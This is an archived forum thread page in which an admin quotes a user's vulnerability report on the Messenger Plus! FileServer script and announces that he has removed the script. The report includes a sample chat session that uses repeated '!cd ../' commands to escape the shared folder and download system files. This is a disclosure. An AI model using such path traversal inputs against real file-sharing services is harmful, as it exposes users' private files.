[Release] FileServer Script v1.1.2

login | register | shoutbox

What happened to the Messenger Plus! forums on msghelp.net?

Shoutbox » MsgHelp Archive » Messenger Plus! for Live Messenger » Scripting » [Release] FileServer Script v1.1.2

[Release] FileServer Script v1.1.2

Author:

Message:

Menthix
forum admin

Posts: 5537
Reputation: 102
40 / Male

Joined: Mar 2002

RE: [Release] FileServer Script v1.1.2

quote:
Originally posted by joepie91

code:
###########################################
Windows Live Messenger Plus! FileServer 1.0
###########################################
Found by joepie91

The FileServer script allows a user using Windows Live Messenger Plus! to share a defined folder and its subfolders and files with a contact.
Authentication is done using a user-defined username and password.
I have found a vulnerability in this script, which allows for downloading of EVERY file on the same disk as the defined folder ("root folder"),
even outside the root folder. The script can be found at http://www.msgpluslive.nl/scripts/view/65-FileServer/

The normal procedure is to use !login to log in, !dir to list files, and !cd to select a folder.

This is an example of a normal communication:
> !login username password
< Login succeeded.
> !dir
< [directory listing goes here]
> !cd music
< OK
> !get music.mp3
< [music.mp3 is sent here]

However, when using ../ with the !cd command, you can actually go beyond the root folder.
This is an example communication (the root directory is C:\shared\files\):
> !login username password
< Login succeeded.
> !cd ../
< OK
> !cd ../
< OK
> !cd windows
< OK
> !dir
< [here goes a directory listing of C:\windows]
> !get explorer.exe
< [client sends back explorer.exe, even though it doesn't have any use]

Might be a good idea to fix that ASAP.

Removed the FileServer script from the site until this is fixed. I know it was reported over half a year ago, just didn't read the thread. Thanks to John for pointing me to it.

Will inform the creator too, but since his last post was in 2006 and all I have to contact is his forum profile I doubt it will result in much.

Finish the problem
Menthix.net | Contact Me

02-08-2010 03:37 PM

« Next Oldest

Return to Top

Next Newest »

Messages In This Thread

[Release] FileServer Script v1.1.2 - by Pai on 07-06-2006 at 10:30 PM

RE: [Release] FileServer Script - by craig2k5 on 07-06-2006 at 11:08 PM

RE: [Release] FileServer Script - by Pai on 07-06-2006 at 11:12 PM

RE: [Release] FileServer Script - by Ezra on 07-06-2006 at 11:14 PM

RE: [Release] FileServer Script - by S4mP410 on 07-06-2006 at 11:45 PM

RE: [Release] FileServer Script - by Jiggs on 07-07-2006 at 12:11 AM

RE: [Release] FileServer Script - by prashker on 07-07-2006 at 01:23 AM

RE: [Release] FileServer Script - by Pai on 07-07-2006 at 01:30 AM

RE: [Release] FileServer Script - by prashker on 07-07-2006 at 01:44 AM

RE: [Release] FileServer Script - by Pai on 07-07-2006 at 01:59 AM

RE: [Release] FileServer Script - by Chancer on 07-07-2006 at 02:13 AM

RE: [Release] FileServer Script - by S4mP410 on 07-07-2006 at 02:14 AM

RE: [Release] FileServer Script - by Chancer on 07-07-2006 at 02:18 AM

RE: [Release] FileServer Script - by prashker on 07-07-2006 at 02:21 AM

RE: [Release] FileServer Script - by Chancer on 07-07-2006 at 02:24 AM

RE: [Release] FileServer Script - by S4mP410 on 07-07-2006 at 02:26 AM

RE: [Release] FileServer Script - by chris on 07-07-2006 at 10:20 AM

RE: [Release] FileServer Script - by Pai on 07-07-2006 at 11:17 AM

RE: [Release] FileServer Script - by xJ + on 07-07-2006 at 12:20 PM

RE: RE: [Release] FileServer Script - by S4mP410 on 07-07-2006 at 01:44 PM

RE: [Release] FileServer Script - by xJ + on 07-07-2006 at 01:52 PM

RE: [Release] FileServer Script - by prashker on 07-07-2006 at 01:54 PM

RE: [Release] FileServer Script - by S4mP410 on 07-07-2006 at 02:10 PM

RE: [Release] FileServer Script - by Pai on 07-07-2006 at 05:15 PM

RE: [Release] FileServer Script - by vaccination on 07-07-2006 at 06:09 PM

RE: [Release] FileServer Script - by snAke_LeAder on 07-07-2006 at 06:49 PM

RE: RE: [Release] FileServer Script - by S4mP410 on 07-07-2006 at 07:31 PM

RE: RE: RE: [Release] FileServer Script - by snAke_LeAder on 07-08-2006 at 12:49 AM

RE: [Release] FileServer Script - by Dhaya on 07-07-2006 at 07:17 PM

RE: [Release] FileServer Script - by Pai on 07-07-2006 at 07:31 PM

RE: [Release] FileServer Script - by Dhaya on 07-07-2006 at 08:00 PM

RE: [Release] FileServer Script - by tinpiliycfa on 07-07-2006 at 08:51 PM

RE: [Release] FileServer Script - by newby on 07-07-2006 at 09:46 PM

RE: [Release] FileServer Script - by Pai on 07-07-2006 at 09:51 PM

RE: [Release] FileServer Script - by newby on 07-07-2006 at 10:05 PM

RE: [Release] FileServer Script - by tinpiliycfa on 07-07-2006 at 10:15 PM

RE: [Release] FileServer Script - by craig2k5 on 07-07-2006 at 10:23 PM

RE: [Release] FileServer Script - by Menthix on 07-07-2006 at 10:38 PM

RE: [Release] FileServer Script - by ddunk on 07-08-2006 at 01:08 AM

RE: RE: [Release] FileServer Script - by snAke_LeAder on 07-08-2006 at 01:16 AM

RE: RE: RE: [Release] FileServer Script - by S4mP410 on 07-08-2006 at 02:24 AM

RE: [Release] FileServer Script - by Pai on 07-08-2006 at 02:04 AM

RE: RE: [Release] FileServer Script - by craig2k5 on 07-08-2006 at 10:13 AM

RE: [Release] FileServer Script v1.1 - by Jellings on 07-08-2006 at 11:08 AM

RE: [Release] FileServer Script v1.1 - by Pai on 07-08-2006 at 11:14 AM

RE: [Release] FileServer Script v1.1 - by newby on 07-08-2006 at 11:29 AM

RE: RE: [Release] FileServer Script v1.1 - by Jellings on 07-08-2006 at 11:37 AM

RE: [Release] FileServer Script v1.1 - by Pai on 07-08-2006 at 11:56 AM

RE: RE: [Release] FileServer Script v1.1 - by Jellings on 07-08-2006 at 12:08 PM

RE: RE: RE: [Release] FileServer Script v1.1 - by newby on 07-08-2006 at 12:57 PM

RE: [Release] FileServer Script v1.1 - by Pai on 07-08-2006 at 05:13 PM

RE: [Release] FileServer Script v1.1 - by Q8_Bond007 on 07-09-2006 at 04:57 PM

RE: [Release] FileServer Script v1.1 - by Pai on 07-09-2006 at 05:11 PM

RE: [Release] FileServer Script v1.1 - by Neverwinter on 07-10-2006 at 09:57 AM

RE: [Release] FileServer Script v1.1 - by ShawnZ on 07-10-2006 at 09:57 AM

RE: [Release] FileServer Script v1.1 - by Neverwinter on 07-10-2006 at 10:09 AM

RE: [Release] FileServer Script v1.1 - by tinpiliycfa on 07-10-2006 at 10:37 AM

RE: [Release] FileServer Script v1.1 - by Pai on 07-10-2006 at 10:50 AM

RE: [Release] FileServer Script v1.1 - by tinpiliycfa on 07-10-2006 at 11:14 AM

RE: [Release] FileServer Script v1.1 - by Pai on 07-10-2006 at 11:26 AM

RE: [Release] FileServer Script v1.1 - by tinpiliycfa on 07-10-2006 at 11:46 AM

RE: [Release] FileServer Script v1.1 - by Pai on 07-10-2006 at 11:56 AM

RE: [Release] FileServer Script v1.1 - by tinpiliycfa on 07-10-2006 at 12:30 PM

RE: [Release] FileServer Script v1.1 - by Lou on 07-10-2006 at 04:24 PM

RE: [Release] FileServer Script v1.1 - by Neverwinter on 07-10-2006 at 05:09 PM

RE: [Release] FileServer Script v1.1 - by Jiggs on 07-10-2006 at 06:14 PM

RE: [Release] FileServer Script v1.1 - by BiruZ on 07-10-2006 at 06:52 PM

RE: RE: [Release] FileServer Script v1.1 - by snAke_LeAder on 07-10-2006 at 07:56 PM

RE: [Release] FileServer Script v1.1 - by qgroessl on 07-10-2006 at 07:20 PM

RE: [Release] FileServer Script v1.1 - by Pai on 07-10-2006 at 10:53 PM

RE: [Release] FileServer Script v1.1 - by cloudhunter on 07-11-2006 at 02:11 AM

RE: [Release] FileServer Script v1.1 - by Pai on 07-11-2006 at 07:34 PM

RE: RE: [Release] FileServer Script v1.1 - by juanitoc on 07-14-2006 at 01:06 AM

RE: [Release] FileServer Script v1.1 - by Xalo on 07-11-2006 at 11:48 PM

RE: [Release] FileServer Script v1.1 - by Pai on 07-12-2006 at 12:25 AM

RE: [Release] FileServer Script v1.1 - by cloudhunter on 07-12-2006 at 12:45 AM

RE: [Release] FileServer Script v1.1 - Translators needed ! - by Xalo on 07-12-2006 at 12:44 PM

RE: [Release] FileServer Script v1.1 - Translators needed ! - by prashker on 07-13-2006 at 06:27 PM

RE: [Release] FileServer Script v1.1 - Translators needed ! - by Pai on 07-13-2006 at 06:48 PM

RE: [Release] FileServer Script v1.1 - Translators needed ! - by prashker on 07-13-2006 at 06:50 PM

RE: [Release] FileServer Script v1.1 - Translators needed ! - by Pai on 07-14-2006 at 09:28 AM

RE: [Release] FileServer Script v1.1 - Translators needed ! - by Controversy92 on 07-14-2006 at 10:49 PM

[no subject] - by GutterClown on 08-27-2006 at 07:46 AM

RE: [Release] FileServer Script v1.1 - Translators needed ! - by sql on 07-15-2006 at 02:16 AM

RE: [Release] FileServer Script v1.1 - Translators needed ! - by Pai on 07-15-2006 at 06:10 PM

RE: [Release] FileServer Script v1.1.1 - Translators needed ! - by Voodooman on 07-16-2006 at 01:09 PM

RE: RE: [Release] FileServer Script v1.1.1 - Translators needed ! - by sql on 07-16-2006 at 03:05 PM

RE: [Release] FileServer Script v1.1.1 - Translators needed ! - by Pai on 07-18-2006 at 12:39 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by cloudhunter on 07-18-2006 at 01:16 AM

RE: RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Voodooman on 07-18-2006 at 02:23 PM

RE: RE: RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by cloudhunter on 07-19-2006 at 01:15 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by bigguy_132 on 07-18-2006 at 05:09 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Raph4 on 07-18-2006 at 07:17 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Pai on 07-18-2006 at 11:55 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by arvit on 07-18-2006 at 01:05 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Pai on 07-19-2006 at 01:56 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by arvit on 07-19-2006 at 09:06 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by cloudhunter on 07-19-2006 at 04:35 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by prashker on 07-21-2006 at 02:26 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Pai on 07-21-2006 at 11:54 AM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by sql on 07-21-2006 at 01:05 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Pai on 07-21-2006 at 01:51 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Ices_Eyes on 07-21-2006 at 03:02 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by prashker on 07-21-2006 at 03:04 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by sql on 07-21-2006 at 03:58 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by UnKnOwN DrAgOoN on 07-21-2006 at 11:21 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Xhysa on 07-22-2006 at 03:14 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Pai on 07-22-2006 at 04:30 PM

RE: RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by sql on 07-22-2006 at 05:07 PM

RE: RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Pai on 08-01-2006 at 02:52 PM

RE: RE: RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by sql on 08-01-2006 at 03:04 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by prashker on 07-22-2006 at 04:31 PM

RE: [Release] FileServer Script v1.1.2 - Translators needed ! - by Pai on 07-22-2006 at 05:35 PM

RE: [Release] FileServer Script v1.1.2 - by sql on 07-22-2006 at 05:42 PM

RE: [Release] FileServer Script v1.1.2 - by Pai on 07-22-2006 at 05:45 PM

RE: RE: [Release] FileServer Script v1.1.2 - by sql on 07-22-2006 at 05:49 PM

RE: [Release] FileServer Script v1.1.2 - by prashker on 07-22-2006 at 05:47 PM

RE: [Release] FileServer Script v1.1.2 - by BlackStar on 07-22-2006 at 08:10 PM

RE: RE: [Release] FileServer Script v1.1.2 - by sql on 07-22-2006 at 08:27 PM

RE: [Release] FileServer Script v1.1.2 - by BlackStar on 07-22-2006 at 08:30 PM

RE: RE: [Release] FileServer Script v1.1.2 - by sql on 07-22-2006 at 08:38 PM

RE: [Release] FileServer Script v1.1.2 - by BlackStar on 07-22-2006 at 08:47 PM

RE: [Release] FileServer Script v1.1.2 - by Pai on 07-22-2006 at 09:03 PM

RE: [Release] FileServer Script v1.1.2 - by Raph4 on 07-23-2006 at 09:00 AM

RE: RE: [Release] FileServer Script v1.1.2 - by cloudhunter on 07-23-2006 at 06:40 PM

RE: [Release] FileServer Script v1.1.2 - by UnKnOwN DrAgOoN on 07-23-2006 at 04:04 PM

RE: [Release] FileServer Script v1.1.2 - by Pai on 07-23-2006 at 08:05 PM

RE: [Release] FileServer Script v1.1.2 - by UnKnOwN DrAgOoN on 07-24-2006 at 08:32 AM

RE: [Release] FileServer Script v1.1.2 - by ThunderStorm on 07-25-2006 at 12:43 PM

RE: [Release] FileServer Script v1.1.2 - by sql on 07-27-2006 at 08:23 PM

RE: [Release] FileServer Script v1.1.2 - by Voodooman on 07-30-2006 at 01:15 AM

RE: [Release] FileServer Script v1.1.2 - by Doonce on 07-31-2006 at 09:23 PM

RE: [Release] FileServer Script v1.1.2 - by bluemouse on 08-01-2006 at 10:30 AM

RE: [Release] FileServer Script v1.1.2 - by Pai on 08-01-2006 at 11:41 AM

RE: [Release] FileServer Script v1.1.2 - by Thor on 08-01-2006 at 11:47 AM

RE: RE: [Release] FileServer Script v1.1.2 - by sql on 08-01-2006 at 01:40 PM

RE: [Release] FileServer Script v1.1.2 - by Pai on 08-01-2006 at 02:18 PM

RE: [Release] FileServer Script v1.1.2 - by sql on 08-01-2006 at 02:36 PM

RE: [Release] FileServer Script v1.1.2 - by Voodooman on 08-03-2006 at 08:26 AM

RE: [Release] FileServer Script v1.1.2 - by Pai on 08-03-2006 at 10:28 AM

RE: [Release] FileServer Script v1.1.2 - by bluemouse on 08-11-2006 at 04:06 AM

RE: [Release] FileServer Script v1.1.2 - by Nightfawx on 08-13-2006 at 07:13 PM

RE: [Release] FileServer Script v1.1.2 - by snAke_LeAder on 08-13-2006 at 07:17 PM

RE: [Release] FileServer Script v1.1.2 - by Nightfawx on 08-13-2006 at 07:17 PM

RE: [Release] FileServer Script v1.1.2 - by JamesBeach on 10-10-2006 at 10:02 AM

RE: [Release] FileServer Script v1.1.2 - by loco9 on 10-12-2006 at 03:54 PM

RE: [Release] FileServer Script v1.1.2 - by Ultrimoz on 10-12-2006 at 07:58 PM

RE: [Release] FileServer Script v1.1.2 - by Geo on 10-16-2006 at 07:53 PM

RE: [Release] FileServer Script v1.1.2 - by TheMusicPirate on 11-06-2006 at 12:45 AM

RE: [Release] FileServer Script v1.1.2 - by spaztaz666 on 11-29-2006 at 07:53 PM

RE: [Release] FileServer Script v1.1.2 - by YottabyteWizard on 12-03-2006 at 08:33 PM

RE: [Release] FileServer Script v1.1.2 - by okaygo on 01-15-2007 at 04:50 AM

RE: [Release] FileServer Script v1.1.2 - by arlenny on 03-25-2007 at 10:18 PM

RE: [Release] FileServer Script v1.1.2 - by droobey on 04-14-2007 at 03:55 PM

RE: [Release] FileServer Script v1.1.2 - by jack192.168 on 05-05-2007 at 11:13 PM

RE: [Release] FileServer Script v1.1.2 - by m0rp3hus on 05-06-2007 at 10:59 AM

RE: [Release] FileServer Script v1.1.2 - by jack192.168 on 05-06-2007 at 08:14 PM

RE: [Release] FileServer Script v1.1.2 - by m0rp3hus on 05-07-2007 at 07:40 AM

RE: [Release] FileServer Script v1.1.2 - by Bryan84 on 05-14-2007 at 07:21 AM

RE: [Release] FileServer Script v1.1.2 - by Manga-Manga on 06-06-2007 at 04:51 PM

RE: [Release] FileServer Script v1.1.2 - by kth6 on 06-11-2007 at 11:06 AM

RE: [Release] FileServer Script v1.1.2 - by prashker on 06-11-2007 at 11:24 AM

RE: [Release] FileServer Script v1.1.2 - by Volv on 06-11-2007 at 12:01 PM

RE: [Release] FileServer Script v1.1.2 - by grooveeo on 06-29-2007 at 04:13 PM

RE: [Release] FileServer Script v1.1.2 - by lyobovnik on 06-29-2007 at 10:28 PM

RE: [Release] FileServer Script v1.1.2 - by useer on 07-02-2007 at 08:47 PM

RE: RE: [Release] FileServer Script v1.1.2 - by lyobovnik on 07-06-2007 at 05:59 PM

RE: [Release] FileServer Script v1.1.2 - by matty on 07-02-2007 at 10:59 PM

RE: [Release] FileServer Script v1.1.2 - by useer on 07-07-2007 at 10:01 PM

RE: RE: [Release] FileServer Script v1.1.2 - by Gareth_2007 on 10-25-2007 at 12:54 AM

RE: [Release] FileServer Script v1.1.2 - by zackry on 07-31-2007 at 10:55 AM

RE: [Release] FileServer Script v1.1.2 - by Volv on 07-31-2007 at 11:01 AM

RE: [Release] FileServer Script v1.1.2 - by ccotm on 08-03-2007 at 09:21 AM

RE: [Release] FileServer Script v1.1.2 - by bosrap on 08-22-2007 at 11:15 PM

RE: [Release] FileServer Script v1.1.2 - by Gareth_2007 on 10-24-2007 at 11:44 PM

RE: [Release] FileServer Script v1.1.2 - by thiagog3guitar on 10-26-2007 at 11:55 AM

RE: RE: [Release] FileServer Script v1.1.2 - by Gareth_2007 on 10-26-2007 at 02:17 PM

RE: [Release] FileServer Script v1.1.2 - by thiagog3guitar on 10-31-2007 at 02:42 PM

RE: [Release] FileServer Script v1.1.2 - by V@no on 11-04-2007 at 03:58 AM

RE: [Release] FileServer Script v1.1.2 - by MaxDeathLore on 11-06-2007 at 04:31 AM

RE: [Release] FileServer Script v1.1.2 - by Gareth_2007 on 11-06-2007 at 07:48 PM

RE: [Release] FileServer Script v1.1.2 - by MaxDeathLore on 11-06-2007 at 10:31 PM

RE: [Release] FileServer Script v1.1.2 - by angarato_surion on 11-22-2007 at 08:58 PM

RE: [Release] FileServer Script v1.1.2 - by riahc4 on 12-10-2007 at 12:58 AM

RE: [Release] FileServer Script v1.1.2 - by Netuser on 07-10-2008 at 11:47 PM

RE: [Release] FileServer Script v1.1.2 - by Ezra on 07-11-2008 at 01:59 AM

RE: RE: [Release] FileServer Script v1.1.2 - by Netuser on 07-11-2008 at 06:32 PM

RE: [Release] FileServer Script v1.1.2 - by tony09 on 07-15-2008 at 06:56 PM

FileServer Script v1.1.2 - by phelippem on 08-28-2008 at 04:32 AM

RE: [Release] FileServer Script v1.1.2 - by EmoMark on 09-04-2008 at 06:39 AM

RE: [Release] FileServer Script v1.1.2 - by zipeater on 01-25-2009 at 03:05 PM

RE: [Release] FileServer Script v1.1.2 - by Dainina on 01-30-2009 at 01:52 PM

RE: [Release] FileServer Script v1.1.2 - by kobba on 03-04-2009 at 09:49 AM

RE: [Release] FileServer Script v1.1.2 - by Shell1230 on 03-15-2009 at 03:17 AM

RE: [Release] FileServer Script v1.1.2 - by SmokingCookie on 03-15-2009 at 06:58 PM

RE: [Release] FileServer Script v1.1.2 - by dannyk90 on 06-25-2009 at 12:27 PM

RE: [Release] FileServer Script v1.1.2 - by joepie91 on 07-03-2009 at 09:35 PM

RE: [Release] FileServer Script v1.1.2 - by Isaacg777 on 10-18-2009 at 04:20 PM

RE: [Release] FileServer Script v1.1.2 - by chamas on 12-09-2009 at 12:06 AM

RE: [Release] FileServer Script v1.1.2 - by Menthix on 02-08-2010 at 03:37 PM

RE: RE: [Release] FileServer Script v1.1.2 - by Phazeus on 02-11-2010 at 01:39 PM

RE: [Release] FileServer Script v1.1.2 - by Menthix on 02-11-2010 at 01:54 PM

RE: [Release] FileServer Script v1.1.2 - by Phazeus on 02-11-2010 at 02:23 PM

RE: [Release] FileServer Script v1.1.2 - by billyy on 02-15-2010 at 02:28 PM

Threaded Mode | Linear Mode
View a Printable Version
Send this Thread to a Friend
Subscribe | Add to Favorites

Forum Rules:
You cannot post new threads You cannot post replies You cannot post attachments You can edit your posts	HTML is Off myCode is On Smilies are On [img] Code is On